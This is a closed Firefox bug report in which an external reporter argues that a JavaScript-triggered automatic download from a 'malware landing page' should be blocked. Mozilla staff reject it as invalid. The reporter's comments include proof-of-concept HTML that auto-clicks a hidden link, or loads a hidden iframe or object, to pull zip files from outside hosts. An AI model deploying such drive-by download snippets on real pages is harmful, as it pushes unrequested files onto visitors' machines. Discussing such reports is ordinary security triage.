Closed Bug 1813575 Opened 2 years ago Closed 2 years ago

Malware can download within js

Categories

(Toolkit :: Safe Browsing, defect)

Product:
Toolkit
Component:
Safe Browsing
Type:
defect

Tracking

()

Status:
RESOLVED INVALID

People

(Reporter: sm.tomal741, Unassigned)

Details

(Keywords: reporter-external, Whiteboard: [reporter-external] [client-bounty-form] [verif?])

Attachments

(1 file)

firefox js execute malware.mp4
1.63 MB, video/mp4
Details

The JavaScript is embedded in the HTML page, and it runs when the page is loaded by the browser. The JavaScript code creates an a element, sets its properties, and adds it to the document.body. When the code triggers the click event on the a element, the browser starts the download process.

In this case, this should be restricted or blocked or show an warning in malware landing page, which is missing in Firefox.

Reproduce Steps:

  1. POC CODE:
<html>
<head>
    <script>
        window.onload = function() {
            const aElement = document.createElement("a");
            aElement.setAttribute("href", "https://filebin.net/archive/1tgmv6mp174kau3n/zip");
            aElement.setAttribute("download", "file.zip");
            aElement.style.display = "none";
        
            document.body.appendChild(aElement);
        
            aElement.click();
        };
    </script>
</head>
<body>
    Example Page Example.
</body>
</html>
  1. URL : https://anacondabd.000webhostapp.com/file4
Flags: sec-bounty?

when visiting this site: https://testsafebrowsing.appspot.com/s/malware.html, the malware trigger by embedded src and it gives warning because of advisory provided by Google Safe Browsing (according to the page). But malware file can also trigger by JS which Firefox don't restrict or block. Also, direct file download or execute something by JS in browser is a security concern which should Firefox look up.

(I've edited the first comment to fix the markup.)

thanks

You can also check this code for malware landing site loaded as object or embed

<html>
<head></head>
<body>
Example Page Example.
<p>
<object data="https://filebin.net/archive/1tgmv6mp174kau3n/zip"></object>
</p>
</body>
</html>

URL: https://anacondabd.000webhostapp.com/obj.html

Component: Security → Safe Browsing
Product: Firefox → Toolkit

(In reply to sm.tomal741 from comment #1)

when visiting this site: https://testsafebrowsing.appspot.com/s/malware.html, the malware trigger by embedded src and it gives warning because of advisory provided by Google Safe Browsing (according to the page). But malware file can also trigger by JS which Firefox don't restrict or block.

We give the warning because that particular download is in the SafeBrowsing list. Browsers aren't anti-virus and we don't scan downloads, all we are doing is checking against known popular malware. It weeds out a lot of stuff to protect people in bulk, but it is no substitute for an anti-virus program to detect novel targeted attacks

Also, direct file download or execute something by JS in browser is a security concern which should Firefox look up.

There are bugs on file for that, but I get the same behavior on Chrome for https://anacondabd.000webhostapp.com/file4 so I believe this is expecting browsers to be what they are not.

Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 2 years ago
Resolution: --- → INVALID

If you were trying to report an issue with safe browsing, you should use example URLs that are blocked by safe browsing. The filebin file downloaded just fine in Chrome for me. Firefox does not block pages that contain embedded things on the safe browsing list, but we don't load them. For instance, in the embed image_large.html malware case from that Chromium bug report loads in Firefox, but we just don't show the image.

I tried the example <embed src="https://testsafebrowsing.appspot.com/s/malware.html"> in the Chrome bug. We do load the HTML page as intended, but we do not load the embedded malware page. I loaded the page in Safari, and clicked through the warning, and then the page has some text like "Malware Page Example", but that text (and the download link) does not appear in Firefox.

take a look in this documentation: https://chromium.googlesource.com/chromium/src/+/acb933d418845fb73e5705ff499e414a021f160c/chrome/test/data/safe_browsing/malware4.html

this is the url: http://anacondabd.000webhostapp.com/obj2
and code:
<html>
<body>
<div foo=1>
<div bar=1>
<embed src="https://anacondabd.000webhostapp.com/obj.html"></iframe>
</div>
</div>
</body>
</html>
even it works in chrome, i don't get any warning

What's the dissimilar now?

And yes browsers aren't anti-virus, and I am not saying this, the problem I faced in malware landing page which auto downloads, and I thought it should be an issue for Firefox, and that's why I reported.

If you bother with filebin then take a look of this.

The given URL to target or when user go to this URL: https://anacondabd.000webhostapp.com/obj4
for obj4 code:
<html>
<head></head>
<body>
Example Page Example.
<p>
<object data="https://anacondabd.000webhostapp.com/obj3"></object>
</p>
</body>
</html>

obj3 code:
<html>
<head></head>
<body>
<iframe id="myIframe" style="display:none"></iframe>
<script>
var iframe = document.getElementById("myIframe");
iframe.src = "https://anacondabd.000webhostapp.com/zipped.zip";
iframe.style.display = "block";
</script>
</body>
</html>

and it can easily download malware by malware landing page, which should be restricted according to documentation.

That is what i am saying must trigger by browser's.

Flags: sec-bounty? → sec-bounty-
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: